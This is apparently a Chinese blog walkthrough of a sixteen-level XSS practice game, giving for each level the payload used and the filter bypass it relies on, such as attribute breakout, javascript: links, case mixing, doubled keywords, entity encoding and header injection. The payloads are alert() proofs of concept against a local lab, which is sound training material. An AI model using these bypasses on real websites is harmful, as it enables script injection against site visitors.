XSS小游戏
第一关

直接在URL输入
?name=<script>alert('xss')</script>

第二关
找源码,输入test,value值变为test,我们可以在输入框尝试xss攻击

闭合前面的input标签,在插入代码
payload
"><script>alert('xss')</script>

第三关
依旧输入test找注入点

输入"><script>alert('xss')</script>

htmlspecialchars()转义成HTML实体
但是htmlspecialchars在默认情况下不会转义单引号,需要设置quotestyle才会进行转义
我们可以从单引号测试 payload
'onclick='window.alert()


第四关
尝试输入<script>alert('xss')</script>

明显的过滤掉了 < >
这里构造payload绕过 < >
"onclick="window.alert('xss')

第五关
尝试输入<script>alert('xss')</script>

将前面的script变成scr_ipt
用其他语句绕过
输入"onlick="window.alert()

依旧替换 on变成o_n
我们采用JavaScript伪协议
"><a href="javascript:alert('xss')">1</a>

点击 1 成功绕过

第六关
直接测试了一下,过滤了很多,查看源码

我们可以采用大小写混合拼写绕过
"><img Src=x Onerror=alert(1)>

第七关
测试了一下,script跟on等直接没了
推测被替换成空,查看源码

果不其然,替换为空,一般采用双写绕过
"><scrscriptipt>alert('xss')</scrscriptipt>

第八关
输入tes

查看源码,过滤了很多,双引号也被过滤掉了

这里我们只要输入JavaScript:alert(‘xss’)即可
但是script被替换成scr_ipt
我们可以采用编码的形式绕过
payload
javascript:alert() #HTML实体编码(HEX)
javascript:alert() #HTML实体编码(DEC)
这是实体编码 entity code
「&#」开头的后接十进制数字,「&#x」开头的后接十六进制数字。

第九关
输入test测试一下,test出现在value值里面

查看源码,比之前多了一串,需要添加http://,否则无效

那么就添加http://
/*这是是注释*/
构造payload
javascript:alert()/*http://www.test.com*/

第十关

分析源码,keyword跟t_sort两个可以进行get传值,同时t_sort过滤掉了<>,并且t_sort隐藏了
构造payload
?t_sort="onclick="alert()"type="text"
?t_sort=" onclick="alert()" type="text"


第十一关

可以用HTTP头的referer进行注入,这里我们需要burpsuite抓包
payload
t_sort="type="text" onclick="alert(1)


第十二关

这里是HTTP头中的Uuser-agent进行注入
构造payload
"type="text" onclick="alert(1)
在User-Agent后面跟随payload即可


第十三关

cookie注入
user=" type="text" onclick="alert(1)"

第十四关
PASS
第十五关

ng-include 指令用于包含外部的 HTML 文件
ng-include 属性的值可以是一个表达式,返回一个文件名。
payload
http://localhost/xss/level15.php?src='level1.php?name=test<img src=1 onerror=alert(1)>'
第十六关

转义成HTML实体,黑名单容易忽略过滤的字符
payload
?keyword=<img%0asrc=1%0aonerror=alert()>
%0a %0b %0c %0d (回车换行) 空格绕过

XSS小游戏的更多相关文章
- xss小游戏通关
xss url:http://test.ctf8.com/level1.php?name=test 小游戏payload: <script>alert("'test'" ...
- XSS----payload,绕过,xss小游戏记录
一.XSS 1.原理:攻击者把恶意的脚本代码注入到网页中,等待其他用户浏览 这些网页(或触发其他条件),从而执行其中的恶意代码. 1.xss实例代码: test.html <!DOCTYPE h ...
- XSS小游戏通关Writeup
源码下载:https://files.cnblogs.com/files/nul1/xss%E7%BB%83%E4%B9%A0%E5%B0%8F%E6%B8%B8%E6%88%8F.zip 我也没啥可 ...
- xss小游戏源码分析
配置 下载地址:https://files.cnblogs.com/files/Lmg66/xssgame-master.zip 使用:下载解压,放到www目录下(phpstudy),http服务下都 ...
- xss games20关小游戏附源代码
1. get方式的的值直接输出来了. ?name=<script>alert(1)</script> 2. 同样没有过滤,不过需要闭合前边的双引号和>. "&g ...
- Monyer.cn黑客小游戏
花了一天的时间,Monyer给大家带来了一个有趣的东东——拥有15个关卡的黑客小游戏. 入口http://monyer.com/game/game1 因为一直以来都是大家跟我一起学习网络技术嘛,所以这 ...
- jQuery实践-网页版2048小游戏
▓▓▓▓▓▓ 大致介绍 看了一个实现网页版2048小游戏的视频,觉得能做出自己以前喜欢玩的小游戏很有意思便自己动手试了试,真正的验证了这句话-不要以为你以为的就是你以为的,看视频时觉得看懂了,会写了, ...
- 拼图小游戏之计算后样式与CSS动画的冲突
先说结论: 前几天写了几个非常简单的移动端小游戏,其中一个拼图游戏让我郁闷了一段时间.因为要获取每张图片的位置,用`<style>`标签写的样式,直接获取计算后样式再用来交换位置,结果就悲 ...
- 推荐10款超级有趣的HTML5小游戏
HTML5的发展速度比任何人的都想像都要更快.更加强大有效的和专业的解决方案已经被开发......甚至在游戏世界中!这里跟大家分享有10款超级趣味的HTML5游戏,希望大家能够喜欢! Kern Typ ...
随机推荐
- Vue中的父组件给子组件传值
父子组件传值: 父组件在调用子组件的地方,添加一个自定义的属性,属性的值就是你要传递给子组件的数据,如果值是一个变量,那么需要使用到绑定属性: 在子组件定义的地方,添加一个props选项,值为一个数组 ...
- 【声明式事务】Spring声明式事务实现(三)
以MyBatis为例. 一.基于注解的声明式事务配置 1. 添加tx名字空间 xmlns:tx="http://www.springframework.org/schema/tx" ...
- 01_javaSE面试题:自增变量
开启刷面试题,都是根据视频进行刷面试题的 自增变量,只要记住两点 i++ 是先赋值后计算 ++i 是先计算后赋值 看下面的代码 int i = 1; i = i++; int j = i++; int ...
- CF798D Mike and distribution
CF798D Mike and distribution 洛谷评测传送门 题目描述 Mike has always been thinking about the harshness of socia ...
- 2019 SDN上机第4次作业
1. 解压安装OpenDayLight控制器(本次实验统一使用Beryllium版本) 配置java环境 安装OpenDayLight控制器 2. 启动并安装插件 cd distribution-ka ...
- IPv6 邻居状态迁移
- Jvisualvm简单使用教程
本博客介绍一下jvisualvm的简单使用教程,jvisualvm功能还是挺多的,不过本博客之简单介绍一下 1.拿线程快照信息 在jdk安装目录找到jvisualvm.exe,${JDK_HOME}\ ...
- Gitlab 部署汉化及邮件配置
Gitlab 简介 Gitlab 是一个基于git私有代码管理的服务集成. Nginx:静态web服务器. gitlab-shell:用于处理Git命令和修改authorized keys列表. gi ...
- C#使用SharpZipLib创建压缩文件,并指定压缩文件夹路径(解决SharpZipLib压缩长路径显示问题)
在项目中使用SharpZipLib压缩文件夹的时候,遇到如果目录较深,则压缩包中的文件夹同样比较深的问题.比如,压缩当前程序目录下的某个文件夹(D:\cx\code\program\bin\debug ...
- Winform中对xml文件进行保存时空白节点自动换行问题的解决
场景 Winform中自定义xml配置文件后对节点进行读取与写入: https://blog.csdn.net/BADAO_LIUMANG_QIZHI/article/details/10053213 ...